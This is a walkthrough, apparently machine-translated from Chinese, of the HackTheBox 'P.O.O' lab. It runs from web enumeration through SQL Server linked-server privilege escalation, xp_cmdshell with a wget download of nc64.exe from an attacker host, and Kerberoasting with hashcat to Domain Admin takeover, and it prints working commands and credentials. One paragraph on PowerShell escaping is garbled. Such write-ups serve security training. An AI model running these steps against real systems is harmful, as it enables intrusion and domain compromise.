当前位置:网站首页>Endgame P.O.O
Endgame P.O.O
2022-06-24 09:41:00 【Little mo and his】
Endgame P.O.O
Recon
First use nmap Sweep it
└─$ sudo nmap -sS -sV -sC 10.13.38.11
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.2027.00; RTM+
|_ssl-date: 2022-06-21T01:44:22+00:00; +4s from scanner time.
| ms-sql-ntlm-info:
| Target_Name: POO
| NetBIOS_Domain_Name: POO
| NetBIOS_Computer_Name: COMPATIBILITY
| DNS_Domain_Name: intranet.poo
| DNS_Computer_Name: COMPATIBILITY.intranet.poo
| DNS_Tree_Name: intranet.poo
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-06-19T02:28:12
|_Not valid after: 2052-06-19T02:28:12
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| ms-sql-info:
| 10.13.38.11:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM+
| number: 14.00.2027.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: true
|_ TCP port: 1433
Swept out 2 One service is 80 Port of IIS The other is 1433 Port of SQL Server. You know there are web Service and database service , First visit the main page and find that it is a default page IIS Interface . There is nothing of interest , Then the next step is to find other entrances, so choose Catalog explosion .
└─$ gobuster dir -u http://10.13.38.11 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt -t 50
===============================================================
/plugins (Status: 301) [Size: 150] [--> http://10.13.38.11/plugins/]
/themes (Status: 301) [Size: 149] [--> http://10.13.38.11/themes/]
/images (Status: 301) [Size: 149] [--> http://10.13.38.11/images/]
/js (Status: 301) [Size: 145] [--> http://10.13.38.11/js/]
/templates (Status: 301) [Size: 152] [--> http://10.13.38.11/templates/]
/admin (Status: 401) [Size: 1293]
/uploads (Status: 301) [Size: 150] [--> http://10.13.38.11/uploads/]
/dev (Status: 301) [Size: 146] [--> http://10.13.38.11/dev/]
/. (Status: 200) [Size: 703]
/widgets (Status: 301) [Size: 150] [--> http://10.13.38.11/widgets/]
/meta-inf (Status: 301) [Size: 151] [--> http://10.13.38.11/meta-inf/]
/.ds_store (Status: 200) [Size: 10244]
/.trashes (Status: 301) [Size: 151] [--> http://10.13.38.11/.trashes/]
First admin and uploads At first glance, I was very interested in it , result admin Requires authentication and uploads Then burst Access is denied, It looks like this. 2 A directory won't work . I tried everything else. They were all Access is denied, except /.ds_store The directory can be downloaded , Checked the About web Sensitive files under the site .DS_Store This file is mostly used for Mac OS X In the system , Although this is a Windows host , Because it's possible to use Mac OS Develop it and then deploy it in a Windows On the machine .
It is now clear that this is a sensitive document , Fortunately, this file is easy to read , Detailed explanation of binary file structure Parsing the .DS_Store file format
At first, I didn't understand much through online tools , Then I found several tools
- Python-dsstore Can resolve local ds_store file
└─ python main.py /home/kali/Downloads/ds_store
Count: 38
admin
admin
admin
dev
dev
dev
iisstart.htm
Images
Images
Images
JS
JS
JS
META-INF
META-INF
META-INF
New folder
New folder
New folder
New folder (2)
New folder (2)
New folder (2)
Plugins
Plugins
Plugins
Templates
Templates
Templates
Themes
Themes
Themes
Uploads
Uploads
Uploads
web.config
Widgets
Widgets
Widgets
In fact, I can't see anything ... Later I learned this
- DS_Walk That can access the site ds_store And then through dsstore The result of analysis is , Take this result to the blasting catalogue
└─$ python /opt/DS_Walk/ds_walk.py -u http://10.13.38.11/
[!] .ds_store file is present on the webserver.
[+] Enumerating directories based on .ds_server file:
----------------------------
[!] http://10.13.38.11//admin
[!] http://10.13.38.11//dev
[!] http://10.13.38.11//iisstart.htm
[!] http://10.13.38.11//Images
[!] http://10.13.38.11//JS
[!] http://10.13.38.11//META-INF
[!] http://10.13.38.11//New folder
[!] http://10.13.38.11//New folder (2)
[!] http://10.13.38.11//Plugins
[!] http://10.13.38.11//Templates
[!] http://10.13.38.11//Themes
[!] http://10.13.38.11//Uploads
[!] http://10.13.38.11//web.config
[!] http://10.13.38.11//Widgets
----------------------------
[!] http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1
[!] http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc
----------------------------
[!] http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1/core
[!] http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1/db
[!] http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1/include
[!] http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1/src
----------------------------
[!] http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc/core
[!] http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc/db
[!] http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc/include
[!] http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc/src
----------------------------
[!] http://10.13.38.11//Images/buttons
[!] http://10.13.38.11//Images/icons
[!] http://10.13.38.11//Images/iisstart.png
----------------------------
[!] http://10.13.38.11//JS/custom
----------------------------
[!] http://10.13.38.11//Themes/default
----------------------------
[!] http://10.13.38.11//Widgets/CalendarEvents
[!] http://10.13.38.11//Widgets/Framework
[!] http://10.13.38.11//Widgets/Menu
[!] http://10.13.38.11//Widgets/Notifications
----------------------------
[!] http://10.13.38.11//Widgets/Framework/Layouts
----------------------------
[!] http://10.13.38.11//Widgets/Framework/Layouts/custom
[!] http://10.13.38.11//Widgets/Framework/Layouts/default
----------------------------
[*] Finished traversing. No remaining .ds_store files present.
[*] Cleaning up .ds_store files saved to disk.
Got far more than gobuster Information about , Then take this 2 String hash to crack md5(mrb3n)=304c0c90fbc6520610abbf378e2339d1、md5(eks)=dca66d38fd916317687e1390a420c3fc
Of course, trying to enter these new directories is also Access is denied. Take it to admin The directory is not a pair Account density . Guess it might be SQL Server Username ?
We can only see if there is any way to find more entrances . come to know IIS There is short name vulnerability, This should be the most widely cited material Microsoft IIS tilde character “~” Vulnerability/Feature – Short File/Folder Name Disclosure
This Chinese blog is easy to understand IIS Short file name brute force guessing vulnerability analysis , This loophole is due to Windows For compatibility 16 position MS-DOS Program ,Windows For a file with a long filename ( And folders ) The corresponding Windows 8.3 Short filename .
We use the tools written by the author IIS_shortname_Scanner Conduct enumeration . We go through ds_walk obtain 2 Same directory for users core、db、include、src, But only db You can sweep . And this 2 individual db There should be the same one in the directory txt file .
└─$ python2 iis_shortname_Scan.py http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc/db
Server is vulnerable, please wait, scanning...
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/p~1.* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/po~1.* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/poo~1.* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/poo_~1.* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/poo_c~1.* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.t* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.tx* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.txt* [scan in progress]
[+] File //dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.txt* [Done]
----------------------------------------------------------------
File: //dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.txt*
----------------------------------------------------------------
└─$ python2 iis_shortname_Scan.py http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1/db
----------------------------------------------------------------
File: //dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.txt*
----------------------------------------------------------------
Obviously poo It's the name of the range , Then the key lies in the following co From the dictionary co The first word grep come out , Then add... To the front and back respectively poo_ and txt that will do .
# hold coxxxx Import fuzz.txt
grep "^co" /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt > fuzz.txt
vim fuzz.txt
# stay vim Middle execution command
# Add... At the beginning of each line poo_
:%s/^/poo_
# Add... At the end of each line .txt
:%s/$/.txt
# Directory enumeration
─$ gobuster dir -u http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db -w /home/kali/Desktop/fuzz.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
/poo_connection.txt (Status: 200) [Size: 142]
Finally I got , Let's see if we can go in . According to the directory and file name, it should be the configuration file of the database ? I hope so
└─$ curl http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/poo_connection.txt
SERVER=10.13.38.11
USERID=external_user
DBNAME=POO_PUBLIC
USERPWD=#p00Public3xt3rnalUs3r#
Flag : POO{fcfb0****************5011ad555}
Not only has the database been Account density , Ben Xiaoguan's flag And I got
Huh?!
Careless , use mssqlclient.py Go and connect , As a result, I couldn't connect , Helpless to see wp Before and after the password 2 individual # I have to take .
└─$ mssqlclient.py external_user:#p00Public3xt3rnalUs3r#@10.13.38.11
Impacket v0.10.1.dev1+20220606.123812.ac35841f - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235)
[!] Press help for extra shell commands
SQL>
You can try it first 1433 - Pentesting MSSQL - Microsoft SQL Server - HackTricks See if there is any way to raise the right .
It turns out that's right , Look, it's not sysadmin Permission will not be directly
SQL> SELECT is_srvrolemember('sysadmin');
-----------
0
And then through wp come to know SQL Server There is a database linking function . The linked databases can execute each other SQL This is a very normal function , however error Will cause us to get permission . Let's first look at the users on this database .
SQL> SELECT name FROM master..syslogins
name
-------------------
sa
external_user
SQL> SELECT name FROM master..syslogins WHERE sysadmin = '1';
name
---------------------------------------
sa
This database has 2 Users are administrator's sa And ordinary me external_user. Even ordinary people need to see what permissions we can use , The result is simply ordinary .
SQL> SELECT entity_name, permission_name FROM fn_my_permissions(NULL, 'SERVER');
entity_name permission_name
------------- --------------------
server CONNECT SQL
SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! I found the first one to talk about this , But I don't think it's very good , I don't know . But he mentioned 2 spot .
- If a link is enabled ( Data access is set to 1), Then every user on the database server can use the link , Regardless of the user's permissions (public、sysadmin Permission doesn't matter )
- If the link is configured to use SQL account , Then each to Destination database The connected account permissions are Destination database Authority . let me put it another way , The server A Public users on may use sysadmin Identity in The server B On the implementation SQL Inquire about .
Are you using Linked Servers? They may be in serious danger! It explains that the wrong configuration will make the linked user sysadmin.MSSQL for Pentester: Abusing Linked Database It explains how to use metasploit and PowerUpSQL Exploit this vulnerability .
View the current host
SQL> select @@servername
--------------------------
COMPATIBILITY\POO_PUBLIC
See if there is a linked host
SQL> select srvname from sysservers;
srvname
------------------------------
COMPATIBILITY\POO_CONFIG
COMPATIBILITY\POO_PUBLIC
We are linked to another host COMPATIBILITY\POO_CONFIG
We send them some requests to see , According to the passage, it is an error
SQL> select version from openquery("linkedserver", 'select @@version as version');
[-] ERROR(COMPATIBILITY\POO_PUBLIC): Line 1: Could not find server 'linkedserver' in sys.servers. Verify that the correct server name was specified. If necessary, execute the stored procedure sp_addlinkedserver to add the server to sys.servers.
Fortunately for us wp The author has solved this problem , Make a request to see the current server , Return results COMPATIBILITY\POO_CONFIG Indicates that the request was successful .
SQL> EXECUTE ('select @@servername;') at [COMPATIBILITY\POO_CONFIG];
------------------------------
COMPATIBILITY\POO_CONFIG
View the current COMPATIBILITY\POO_CONFIG Users of
SQL> EXECUTE ('select suser_name();') at [COMPATIBILITY\POO_CONFIG];
------------------------------
internal_user
Also take a look at COMPATIBILITY\POO_CONFIG Database has sysadmin Who are the users with permissions
SQL> EXECUTE ('SELECT name FROM master..syslogins WHERE sysadmin = ''1'';') at [COMPATIBILITY\POO_CONFIG];
name
----------------
sa
still sa, Then we let COMPATIBILITY\POO_CONFIG towards COMPATIBILITY\POO_PUBLIC Make a request
SQL> EXEC ('EXEC (''select suser_name();'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
------------------------------
sa
Something amazing happened , We became sa user . Explain this 2 There is an incorrect configuration between the databases, which leads to the elevation of our permissions , Check permissions again , Found that we have all the permissions
SQL> EXECUTE ('EXECUTE (''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
entity_name permission_name
------------------------------ ------------------------------
server CONNECT SQL
server SHUTDOWN
server CREATE ENDPOINT
server CREATE ANY DATABASE
server CREATE AVAILABILITY GROUP
server ALTER ANY LOGIN
server ALTER ANY CREDENTIAL
server ALTER ANY ENDPOINT
server ALTER ANY LINKED SERVER
server ALTER ANY CONNECTION
server ALTER ANY DATABASE
server ALTER RESOURCES
server ALTER SETTINGS
server ALTER TRACE
server ALTER ANY AVAILABILITY GROUP
server ADMINISTER BULK OPERATIONS
server AUTHENTICATE SERVER
server EXTERNAL ACCESS ASSEMBLY
server VIEW ANY DATABASE
server VIEW ANY DEFINITION
server VIEW SERVER STATE
server CREATE DDL EVENT NOTIFICATION
server CREATE TRACE EVENT NOTIFICATION
server ALTER ANY EVENT NOTIFICATION
server ALTER SERVER STATE
server UNSAFE ASSEMBLY
server ALTER ANY SERVER AUDIT
server CREATE SERVER ROLE
server ALTER ANY SERVER ROLE
server ALTER ANY EVENT SESSION
server CONNECT ANY DATABASE
server IMPERSONATE ANY LOGIN
server SELECT ALL USER SECURABLES
server CONTROL SERVER
Then we create one that has sysadmin Users with permission can
SQL> EXECUTE('EXECUTE(''CREATE LOGIN df WITH PASSWORD = ''''[email protected]#'''';'') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG] SQL> EXECUTE('EXECUTE(''EXEC sp_addsrvrolemember ''''df'''', ''''sysadmin'''''') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
If login fails , Just wait a minute , It will take a while for it to take effect .
─$ mssqlclient.py 'df:[email protected]#@10.13.38.11'
Impacket v0.10.1.dev1+20220606.123812.ac35841f - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235)
[!] Press help for extra shell commands
# List databases
SQL> SELECT name FROM master..sysdatabases;
name
------------------------------
master
tempdb
model
msdb
POO_PUBLIC
flag
# view the database flag
SQL> select table_name,table_schema from flag.INFORMATION_SCHEMA.TABLES;
table_name table_schema
------------------------------ ------------------------------
flag dbo
# Query table flag
SQL> select * from flag.dbo.flag;
flag
----------------------------------------
b'POO{88d829eb************************}'
BackTrack
This time we got sysadmin, Think like STARTING POINT TIER 2 Archetype Go through like that xp_cmdshell To execute powershell And then the nc64.exe.
# View the current user
SQL> xp_cmdshell "powershell -c whoami"
output
----------------------------------
nt service\mssql$poo_public
# Enter the current directory and upload the file
SQL> xp_cmdshell "powershell -c cd C:\Users\MSSQL`$POO_PUBLIC\Downloads; wget http://10.10.17.21/nc64.exe -outfile nc64.exe" output ----------------------------------------------------- wget : Unable to connect to the remote server # The result is not out of the network , It's nothing SQL> xp_cmdshell "powershell -c ping 10.10.17.21"
output
---------------------------------------------------------- Pinging 10.10.17.21 with 32 bytes of data:
Ping statistics for 10.10.17.21:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss)
But here I learned powershell The escape sign of , stay powershell in ** ∗ ∗ generation surface change The amount and use Household name ‘ M S S Q L ** Represents a variable and a user name `MSSQL ∗∗ generation surface change The amount and use Household name ‘MSSQLPOO_PUBLIC Medium P O O P U B L I C ‘ Meeting By When become change The amount , the With can With send use ∗ ∗ ‘ ∗ ∗ Come on turn The righteous ∗ ∗ POO_PUBLIC` Will be treated as a variable , So you can use **`** To escape ** POOPUBLIC‘ Meeting By When become change The amount , the With can With send use ∗∗‘∗∗ Come on turn The righteous ∗∗**.
You have to test it before uploading files in the future Connectivity Otherwise, it will be useless .
I can only look at it first file system 了
SQL> xp_cmdshell "powershell cd C://; ls"
output
------------------------------------------------------------------------
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/13/2019 3:58 AM inetpub
d----- 9/15/2018 10:19 AM PerfLogs
d-r--- 12/12/2019 7:35 PM Program Files
d----- 12/13/2019 4:01 AM Program Files (x86)
d-r--- 12/12/2019 6:02 PM Users
d----- 11/25/2021 9:36 PM Windows
-a---- 6/19/2022 12:35 PM 165593 PowerView.ps1
inetpub yes IIS Server directory , Found in it web.config But the current account does not have permission to view
SQL> xp_cmdshell "powershell type C:\inetpub\wwwroot\web.config;"
------------------------------------------------------------------------
type : Access to the path 'C:\inetpub\wwwroot\web.config' is denied.
come to know SQL Server You can use external scripts to extend , And can be configured to run these scripts for another user .
How to be in SQL Server 2017 Use python Script SQL Server 2017 - Python Executing Inside SQL Server
SQL> EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("whoami");';
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
compatibility\poo_public01
As a result, we became poo_public01 user , And the user can view web.config file
SQL> EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("type C:\inetpub\wwwroot\web.config");';
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<staticContent>
<mimeMap
fileExtension=".DS_Store"
mimeType="application/octet-stream"
/>
</staticContent>
<!--
<authentication mode="Forms">
<forms name="login" loginUrl="/admin">
<credentials passwordFormat = "Clear">
<user
name="Administrator"
password="EverybodyWantsToWorkAtP.O.O."
/>
</credentials>
</forms>
</authentication>
-->
</system.webServer>
</configuration>
Get the account and password http://10.13.38.11/admin/ Just type in .
Foothold
The last part has been taken IIS Server's Account density , Then the idea is to find Remote connection service . Because it is the database administrator right now , Just list which ports are in service , Look again. ip
SQL> EXEC sp_execute_external_script @language = N'Python', @script = N'import os; os.system("netstat -ano");';
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 916
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 4684
TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:41433 0.0.0.0:0 LISTENING 4692
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 492
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1168
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1672
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
UDP [::]:123 *:* 760
UDP [::]:500 *:* 2560
UDP [::]:1434 *:* 2792
UDP [::]:3702 *:* 2464
UDP [::]:3702 *:* 2464
UDP [::]:4500 *:* 2560
UDP [::]:5353 *:* 1080
UDP [::]:5355 *:* 1080
UDP [::]:59578 *:* 2464
SQL> EXEC sp_execute_external_script @language = N'Python', @script = N'import os; os.system("ipconfig");';
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
Windows IP Configuration
Ethernet adapter Ethernet1:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.20.128.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::250
IPv6 Address. . . . . . . . . . . : dead:beef::1001
IPv6 Address. . . . . . . . . . . : dead:beef::6033:f520:ab97:3e4
Link-local IPv6 Address . . . . . : fe80::6033:f520:ab97:3e4%5
IPv4 Address. . . . . . . . . . . : 10.13.38.11
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : dead:beef::1
fe80::250:56ff:feb9:1f8d%5
10.13.38.2
after wp A hint of , You need to use ipv6 You can only sweep it once Remote connection service , This reminds me of a situation I encountered before Remote connection service Don't go TCP The agreement is to use UDP The agreement has to be UDP To sweep it out .
Strangely enough ipconfig Come out 3 individual ipv6 Then just sweep it all over , Also use UDP I also scanned it .
The results are different , So be suspicious of the scan results , When you feel there is no way to go, you can question the scan results , Think about what posture you can use to sweep .
└─$ sudo nmap -sS -p 80,135,445,1433,5357,5985,41433,47001,49664,49665,49666 -6 dead:beef::250 --min-rate 10000
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-22 04:15 EDT
Nmap scan report for dead:beef::250
Host is up (0.51s latency).
PORT STATE SERVICE
80/tcp open http
135/tcp filtered msrpc
445/tcp filtered microsoft-ds
1433/tcp open ms-sql-s
5357/tcp filtered wsdapi
5985/tcp filtered wsman
41433/tcp filtered unknown
47001/tcp filtered winrm
49664/tcp filtered unknown
49665/tcp filtered unknown
49666/tcp filtered unknown
└─$ sudo nmap -sS -p 80,135,445,1433,5357,5985,41433,47001,49664,49665,49666 -6 dead:beef::1001 --min-rate 10000
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-22 04:17 EDT
Nmap scan report for dead:beef::1001
Host is up (0.38s latency).
PORT STATE SERVICE
80/tcp open http
135/tcp filtered msrpc
445/tcp filtered microsoft-ds
1433/tcp open ms-sql-s
5357/tcp filtered wsdapi
5985/tcp open wsman
41433/tcp filtered unknown
47001/tcp filtered winrm
49664/tcp filtered unknown
49665/tcp filtered unknown
49666/tcp filtered unknown
You can see dead:beef::1001 Result 5985 yes open Of , and dead:beef::250 yes filtered.
It can be used evil-winrm Lai Lian , however evil-winrm It seems that you can't lose directly ipv6 Address , Need to put dead:beef::1001 hostname write in /etc/hosts in
SQL> EXEC sp_execute_external_script @language = N'Python', @script = N'import os; os.system("hostname");';
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
COMPATIBILITY
# hold dead:beef::1001 COMPATIBILITY write in /etc/hosts
└─$ evil-winrm -i compatibility -u administrator -p 'EverybodyWantsToWorkAtP.O.O.'
*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Desktop> whoami
compatibility\administrator
# stay \Administrator\Desktop Find out flag.txt
p00ned
Now we have got the administrator permission of a host . And in the domain intranet.poo in .
*Evil-WinRM* PS C:\Users\Administrator\Desktop> systeminfo
Host Name: COMPATIBILITY
OS Name: Microsoft Windows Server 2019 Standard
Domain: intranet.poo
Hotfix(s): 4 Hotfix(s) Installed.
[01]: KB4533013
[02]: KB4516115
[03]: KB4523204
[04]: KB4530715
So the first step is to search for hosts and users in the domain , It turns out that none of them , Because local users cannot send requests to the domain .
however ,SQL Server Accounts can replace . Service accounts Automatic simulation Computer account,Computer account Is a member of the domain , It's actually a special type of user account .
stay Intranet penetration | SPN And Kerberoast Attack explanation I learned that Kerberos The protocol and SPN, Looking down, there is a GetUserSPNs.ps1 Script , use evil-winrm Upload , The result seems unstable , You can't succeed when you come back
*Evil-WinRM* PS C:\programdata> Import-Module .\GetUserSPNs.ps1
Exception calling "FindAllGlobalCatalogs" with "0" argument(s): "An operations error occurred. "
At C:\programdata\GetUserSPNs.ps1:30 char:3
+ $CurrentGCs = $ForestInfo.FindAllGlobalCatalogs()
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : ActiveDirectoryOperationException
No Global Catalogs Found!
then PowerView.ps1 The script may have been WD Stopped Powershell Get-Random with dates blocked with "this script contains malicious content" It seems that I can only WD Update or add to the white list .
But fortunately, Invoke-Kerberoast.ps1 Can also , This script can be exported directly Hashcat A note in the form of . But in evil-winrm Failed to execute in , Connected SQL Server Of shell It can be executed , Probably because evil-winrm Not enough permissions ? But the user is already compatibility\administrator Administrator , Maybe the domain permissions are insufficient ?
SQL> xp_cmdshell "powershell -c import-module c:\programdata\invoke-kerberoast.ps1; invoke-kerberoast -outputformat hashcat"
output
--------------------------------------------------------------------
TicketByteHexStream : # A little
SamAccountName : p00_hr
DistinguishedName : CN=p00_hr,CN=Users,DC=intranet,DC=poo
ServicePrincipalName : HR_peoplesoft/intranet.poo:1433
TicketByteHexStream : # A little
SamAccountName : p00_adm
DistinguishedName : CN=p00_adm,CN=Users,DC=intranet,DC=poo
ServicePrincipalName : cyber_audit/intranet.poo:443
Got it 2 Users p00_hr and p00_adm The paper , Directly from shell There are a lot of spaces in the copy , Write a script to handle . because Hashcat There is... In your bill $, So put it in single quotes , Double quotation marks will be used to mark the string shell analysis .
#!/bin/bash
printf `echo $1 | sed 's/[[:space:]]//g'`;
└─$ ./strip_blank.sh 'p00_adm The paper '
$krb5tgs$23$*p00_adm$intranet.poo$cyber_audit/intranet.poo:443*$2D174A783C330A55AB2AF8E5733E074F$282865F55044416D0B8215DEBA1C8702368E0ED12620ABEFD419A1DE6DEB0465B85BB9D7F643577AE16BD9E8404F49B65A8E9F172AC44A875ED202714C9F63732E4D909833C8363492525FD9F35700804B2187291ED14B39CC82C3D1F8549AFD8D9FA4FA83AC1F2164F064C243E0A3FF0469ECCD2DC874B6C16DE5B530BD97571A669A7AA4BDA170E80859FDC66C0E922ADA65CBC66B78A4FA66F2E59E2EB8B5F806EE7CCB5ADA02391CE93F5C9DB7E91D41247E08D9C8977ADCC3841400852BC5E7C02AB1A6129710499007941B8541AA9108BAC770C04CB5EEF42BF39E5B46FFE716DA4A00AFADA2D47D24EF737D66CD1895C68E68299B75820491203D412D6B1F7BB6969F6D789F7764A183EDB4E97C731DE045154EDC76427A3CAA6C46FFB2203E64C2F0D45303B38C367E3906A612D5A66DCB14284B2D39CC7F2AB07E212AB60B1F18FB9880E4F43CA64E6FF8F2DA27617A1C262660140915B9CA7A6A344A3F0FB347006F40D88B29A006358A755748ADE2D606B872394C9826099F09FECDDF9B3969474632BC635AA039AF3CAD02D60C59A27765DAB66F0EA12A740F9F53F459B3AD866B24A7FBAF17E73500C6A9F5F6E57849BED1570AD8D4070573BD21DBC098D830ECEE9047BE0F6318CF930E4156C1BFD6813FF0CD1D77DE081C3012B579659CF698B23C50E50DC44D09135C54540EF1A33A158E428F4D56890025CA3A56E615AC1C16175974C2B96ECAE9B340463EE71836D0F0E0CF08178E3A386F9F7DB3398F811C0D7A8BB352E9E7FC1D4EB5275A9C3605DCB9285B95E1CF7C45A2BB757649B3FF80E836118B60541CE67CC72B0A74B50E9383B211B039A95DAD66D70E885B2D805BF68A3452306189433D37FCFD9E7804F8F7E3B98A2D8AC12A436BD7A1B4392D97EECCE519940DC9886446498D8459D279836310C0BEFBE85A2CC5146A2251D3A71EB198DAE7275A14F686ADAE3199FCB766C955A093F3620CE8F0F6CAA84307D827BFD805E6FC3939EEB2458AEF8685E9347DED0EF47926CED7F0402C75BD6CE84A88BDE1C4BFE245F80923F2F8AFF1ACA9AB30F205FBB04BF2F49D6D112220486E55D416D0943B3B23D4F049C7207B93ADED3CF83F4679B061CD6071C35DF5751272F1025A97908D86AB91F4F84CDA4BDD250F31EC72CB2A7C1EA7E0A1D7C5EDB37A5904B59EE30882D0C7AC60042439303733A1D266A9191F60DC880AF13865A5592EB309786AE264A5CCEE57F3963FC42C724AD9202871D07AD11E17D1E57297129D5DB09497ADA8C15A6A4F859C5B27AFB32574A779BF724F316F735112556CEF32BD46B8010E0E160DA5EA81281088EB0889406CC790DBA8442219FB332963D6E428E7990C7961283C5344ECCD81442EEC5DEB3B740CEA3FECA73A70B87044DF2104B6DDC55605DEBD4421FBE970539B526CDDFFBCBF0C65E36409700C46BA547707BCECF8FF4D5600485
└─$ hashcat -m 13100 hash.txt /usr/share/seclists/Passwords/Keyboard-Combinations.txt --force
# The password is ZQ!5t4r
Then let's take p00_adm Join the domain Administrators group
*Evil-WinRM* PS C:\programdata> $pass = ConvertTo-SecureString 'ZQ!5t4r' -AsPlainText -Force
*Evil-WinRM* PS C:\programdata> $cred = New-Object System.Management.Automation.PSCredential('intranet.poo\p00_adm', $pass)
*Evil-WinRM* PS C:\programdata> Add-ADGroupMember -Identity 'Domain Admins' -Members 'p00_adm' -Credential $cred
└─$ evil-winrm -i compatibility -u p00_adm -p 'ZQ!5t4r'
*Evil-WinRM* PS C:\Users\p00_adm\Documents> net use \\DC.intranet.poo\c$ /u:intranet.poo\p00_adm 'ZQ!5t4r'
The command completed successfully.
*Evil-WinRM* PS C:\Users\p00_adm\Documents> dir \\DC.intranet.poo\c$\users\
